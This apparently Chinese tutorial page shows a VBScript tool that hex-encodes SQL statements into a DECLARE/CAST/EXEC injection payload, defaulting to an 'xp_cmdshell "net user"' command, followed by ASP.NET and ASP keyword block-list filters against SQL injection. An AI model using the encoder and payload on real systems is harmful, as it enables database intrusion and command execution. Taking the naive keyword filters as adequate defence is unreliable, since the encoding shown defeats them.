SQL注⼊之SQL语句转⼗六进制
<script language=vbs>
sub sqlencode()
Dim strTest
strTest = 1.value
myHex = Str2Hex(strTest)
document.write "<pre>DECLARE @S NVARCHAR(4000) SET @S=CAST(0x"&myhex&" AS NVARCHAR(4000)) EXEC(@S)
</pre>"
end sub
Function Str2Hex(ByVal strHex)
Dim sHex
For i = 1 To Len(strHex)
sHex = sHex & Hex(Asc(Mid(strHex,i,1)))&"00"
Next
Str2Hex = sHex
End Function
</script>
<form name=form1 method="post">
<p>请输⼊sql语句,例⼦:</p><br>
<input type=text name=text1 value='exec master.dbo.xp_cmdshell "net user"--' size=100><input type=submit
οnclick=sqlencode()
value="给我转">
</form>
exp
原程序代码
转换后的代码
DECLARE @S NVARCHAR(4000) SET
@S=CAST(0x4400450043004C0041005200450020004000540020005600410052004300480041005200280032003500 AS NVARCHAR(4000)) EXEC(@S)
ASP.NET防SQL注⼊程序代码
using System;
using System.Configuration;
using System.Web;
using System.Globalization;
namespace Koray.SqlInject
{
/* public class SqlInject
{
}
*/
public class SqlstrAny : IHttpModule
{
public void Init(HttpApplication application)
{
application.BeginRequest += (new
EventHandler(this.Application_BeginRequest));
}
private void Application_BeginRequest(Object source, EventArgs e)
{
ProcessRequest pr = new ProcessRequest();
pr.StartProcessRequest();
}
public void Dispose()
{
}
}
public class ProcessRequest
{
private static string SqlStr = System.Configuration.ConfigurationManager.AppSettings["SqlInject"].ToString(); private static string sqlErrorPage =
System.Configuration.ConfigurationSettings.AppSettings["SQLInjectErrPage"].ToString();
///
///
///
///
bool IsUploadRequest(HttpRequest request)
{
return StringStartsWithAnotherIgnoreCase(request.ContentType, "multipart/form-data");
}
///
/// ⽐较内容类型
///
///
代码转换
///
///
private static bool StringStartsWithAnotherIgnoreCase(string s1, string s2)
{
return (string.Compare(s1, 0, s2, 0, s2.Length, true, CultureInfo.InvariantCulture) == 0);
}
#region SQL注⼊式攻击代码分析
///
///
public void StartProcessRequest()
{
HttpRequest Request = System.Web.HttpContext.Current.Request;
HttpResponse Response = System.Web.HttpContext.Current.Response;
try
{
string getkeys = "";
if (IsUploadRequest(Request)) return; //如果是流传递就退出
//字符串参数
if (Request.QueryString != null)
{
for (int i = 0; i < Request.QueryString.Count; i++)
{
getkeys = Request.QueryString.Keys[i];
if (!ProcessSqlStr(Request.QueryString[getkeys]))
{
logSqlstr(DateTime.Now.ToShortDateString() +" "+DateTime.Now.ToShortTimeString()+ ":" + Request.ServerVariables["Url"]);
logSqlstr(getkeys + "=" + Request.QueryString[getkeys]);
Response.Redirect(sqlErrorPage + "?errmsg=QueryStringError&sqlprocess=true");
Response.End();
}
}
}
//form参数
if (Request.Form != null)
{
for (int i = 0; i < Request.Form.Count; i++)
{
getkeys = Request.Form.Keys[i];
if (!ProcessSqlStr(Request.Form[getkeys]))
{
logSqlstr(DateTime.Now.ToShortDateString() + " " + DateTime.Now.ToShortTimeString() + ":" + Request.ServerVariables["Url"]);
logSqlstr(getkeys + "=" + Request.Form[getkeys]);
Response.Redirect(sqlErrorPage + "?errmsg=FormError&sqlprocess=true");
Response.End();
}
}
}
//cookie参数
if (Request.Cookies != null)
{
for (int i = 0; i < Request.Cookies.Count; i++)
{
getkeys = Request.Cookies.Keys[i];
if (!ProcessSqlStr(Request.Cookies[getkeys].Value))
{
logSqlstr(DateTime.Now.ToShortDateString() + " " + DateTime.Now.ToShortTimeString() + ":" + Request.ServerVariables["Url"]);
logSqlstr(getkeys + "=" + Request.Cookies[getkeys]);
Response.Redirect(sqlErrorPage + "?errmsg=CookieError&sqlprocess=true");
Response.End();
}
}
}
}
catch(Exception ex)
{
// 错误处理: 处理⽤户提交信息!
Response.Clear();
Response.Write("CustomErrorPage Error"+ex.Message);
Response.End();
}
}
///
/// 分析⽤户请求是否正常
///
/// 传⼊⽤户提交数据
/// 返回是否含有SQL注⼊式攻击代码
private bool ProcessSqlStr(string Str)
{
bool ReturnValue = true;
try
{
if (Str != "")
{
Str = Str.ToLower();
string[] anySqlStr = SqlStr.Split('|');
foreach (string ss in anySqlStr)
{
if (Str.IndexOf(ss) >= 0)
{
ReturnValue = false;
break;
}
}
}
}
catch
{
ReturnValue = false;
}
return ReturnValue;
}
private void logSqlstr(string str)
{
HttpRequest req = System.Web.HttpContext.Current.Request;
string fileName = "/Log/log_"+DateTime.Now.ToShortDateString().Replace("/","_")+".log";
fileName=req.MapPath(fileName);
if (!System.IO.File.Exists(fileName))
{
System.IO.FileStream f = System.IO.File.Create(fileName);
f.Close();
}
System.IO.StreamWriter f2 = new System.IO.StreamWriter(fileName, true, System.Text.Encoding.GetEncoding("utf-8"));
f2.WriteLine(str);
f2.Close();
f2.Dispose();
}
#endregion
}
}
在fig中加⼊
<appSettings>
<add value="exec|insert|delete|update|chr|mid|master|truncate|declare|cast(|drop table" key="SQLInject" />
<add value="/error.aspx" key="SQLInjectErrPage" />
</appSettings>
<httpModules>
<add name="SqlstrAny" type="Koray.SqlInject.SqlstrAny,Koray.SqlInject"/>
</httpModules>
ASP防SQL注⼊代码
Sub SQLInject
Dim strTemp,errLogFile,rtnerr,RtnArr,ErrLogFileName
ErrLogFileName="/Log/err_"&DateToStr(Now(),"Y-m-d")&".log"
strTemp=""
strTemp = strTemp & Request.ServerVariables("URL")
If Trim(Request.QueryString) <> "" Then strTemp = strTemp & "?" & Trim(Request.QueryString)
strTemp = Lcase(strTemp)
If Instr(strTemp,"declare") or Instr(strTemp,"select") or Instr(strTemp,"insert into") or Instr(strTemp,"delete from") or Instr(strTemp,"count(") or Instr(strTemp,"drop table") or Instr(strTemp,"truncate") or Instr(strTemp,"mid(") or
Instr(strTemp,"char(") or Instr(strTemp,"xp_cmdshell") or Instr(strTemp,"exec master") or Instr(strTemp,"net localgroup administrators") or Instr(strTemp,":") or Instr(strTemp,"net user") or Instr(strTemp,"'") then
RtnArr=LoadFromFile(ErrLogFileName)
if RtnArr(0)=0 then
errLogFile=RtnArr(1)
else
errLogFile="start"
end if
errLogFile=errLogFile&vbcrlf&vbcrlf
errLogFile=errLogFile&"IP:"&getIP()&" Time:"&Cstr(Now())&" Info:"&strTemp
rtnerr=SaveToFileByGb2312(errLogFile,ErrLogFileName)
Response.Write "<html><title>Waring</title><body bgcolor=""EEEEEE"" leftmargin=""60"" topmargin=""30""><font font-size:16px;font-weight:bolder;color:blue;""><li>You has been submit a bad querystring!</li></font><font
font-size:14px;font-weight:bolder;color:red;""><br><li>Your Ip Has been record!</li><br><li>IP:"&getIP()&"</li><br> <li>Time:"&Now&"</li></font></body></html><!--AddTime:"&now&"-->"
End If
End Sub
豫公网安备41160202000603
站长QQ:729038198
关于我们
投诉建议